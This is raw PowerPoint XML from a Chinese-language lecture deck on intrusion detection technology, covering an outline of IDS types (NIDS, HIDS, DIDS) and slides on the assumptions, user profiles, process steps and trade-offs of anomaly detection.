            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DE48FB-93CB-4A83-80C4-819A2E19507D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="矩形: 圆角 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075E11FA-47AF-410A-B62E-11BF604B473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7C1ACD8E-1DB0-407F-8ED0-530CC024A020}"/>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01</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0245B580-05B9-4A4A-A880-F45BF4A3B95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 入侵检测系统概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F393E855-347F-47DC-BF7C-D072346A7DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="2520000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBE5B2F-A33E-455C-94DC-0DD74C8598CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 圆角 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2BBEC0-744D-4D63-A1D7-D3EF3C0B5C6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0AFCDB31-7A42-4D30-973E-C7696D19502E}"/>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02</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FFEE7EAF-90BC-43F6-B7C2-088D4C3BCA4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accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>原理和主要方法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75EFCCFF-6C07-4C65-8ED3-5FFF91FBAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="3420000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="组合 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6066EB41-F32C-45C4-99C1-0918D8C5174D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形: 圆角 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14524E7A-B812-4FB1-9D63-990CF664AB3A}"/>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86134F92-3E5A-4DE8-A8AE-9BB2DCB1B79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03</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DE2AA675-157B-45F1-8702-9486056053C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NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>DIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF4BA50-6F79-4FE0-BB85-8085EE0839A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="4320000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0402F17D-9F88-4B2E-A2AA-6923F05BD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="矩形: 圆角 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650FD5F4-700F-4B0F-A2B8-16032AC000BF}"/>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8F3D8D06-0624-458B-A28D-DE6AA2A8DE2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04</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0A859A2D-CD96-4333-A77B-BDB862C2EA42}"/>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设计和部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB501-4561-4A8B-88BE-E5161D7F9B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="5220000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A2424-D0A6-4827-88BE-67EAB3DBF146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 圆角 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDEF9F-D729-4403-B8DA-D4E751BBA199}"/>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8214CB29-1AB2-4F17-9C41-BEA3D489A22A}"/>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05</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257C772-5D23-4601-A412-371CC7099EA0}"/>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发展趋势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="标题 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB32422-F32E-444F-8DBA-2CC4A9ADFB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1931222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867767"/>
            <a:ext cx="1239837" cy="1555656"/>
            <a:chOff x="3792538" y="2928938"/>
            <a:chExt cx="1239837" cy="1555656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="AutoShape 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="2928938"/>
              <a:ext cx="1239837" cy="1555656"/>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92550" y="3021013"/>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340092"/>
              <a:ext cx="1109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异常</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295627" y="3673258"/>
            <a:ext cx="6268344" cy="2581313"/>
            <a:chOff x="158" y="1888"/>
            <a:chExt cx="5465" cy="1891"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44"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 y="1888"/>
              <a:ext cx="5465"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20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2472" y="3022"/>
              <a:ext cx="998" cy="271"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="A9D6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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>异常检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743392" y="2526012"/>
            <a:ext cx="8242935" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12981" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="11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识别主机或网络中的异常行为</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56" name="组合 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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0"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1" name="组合 60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2745173" y="1869034"/>
            <a:ext cx="4292600" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="6760" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="552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基于行为的入侵检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="63" name="组合 62"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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5"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sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217293" y="4027252"/>
            <a:ext cx="2889978" cy="7962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能检测</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未知</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217293" y="4751152"/>
            <a:ext cx="1820940" cy="7962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误报率高</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E984CCDB-5D7B-415C-9ECD-833158AE3FFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</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1716031"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假设前提</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100547" y="2477285"/>
            <a:ext cx="746061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各种行为参数及其阀值的集合</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3083733" y="1260000"/>
            <a:ext cx="646366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入侵行为是异常活动的子集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B0C70C-146C-6F85-F95C-19683F044BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2481514"/>
            <a:ext cx="1748503" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424F54AD-4FCB-2F2B-D906-3B00675B860E}"/>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6" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD62BB9F-9254-D6A6-55D3-08A06F8253EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3840958"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8" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD5841E-2F12-9F31-06F6-4A6FEE70FEFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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用户轮廓</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED48CE4-38DF-621A-C1E6-C7E3AC0DC049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="4220729"/>
            <a:ext cx="1716031" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A5EDFD-7E57-1D3D-3F5F-42E1E5CCD669}"/>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a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D10C28-90F1-C4A4-4E9D-2D8FE0A3F754}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3845096"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68" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51D05DB7-C094-BDB2-6669-CA7E1B8C5FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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检测过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Freeform 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C4D573-C220-8A97-DFBD-45747B25227A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4145506" y="3865153"/>
            <a:ext cx="6269241" cy="1921601"/>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ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777C130B-E676-3F2D-790C-ACC96773803C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5660804" y="3691094"/>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监控</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D107D57A-919E-FFEC-8A8E-DF138C5CAB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3870104" y="4575691"/>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量化</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C3D3730-B30B-01A0-8A0B-DEFE6F037E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6084084" y="5464766"/>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比较</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B588B4D5-F848-1578-10F1-F22B2AD729D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8637178" y="5176277"/>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判定</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC52C1E9-4354-3310-E868-0AB83D01F80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8419859" y="3691094"/>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修正</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
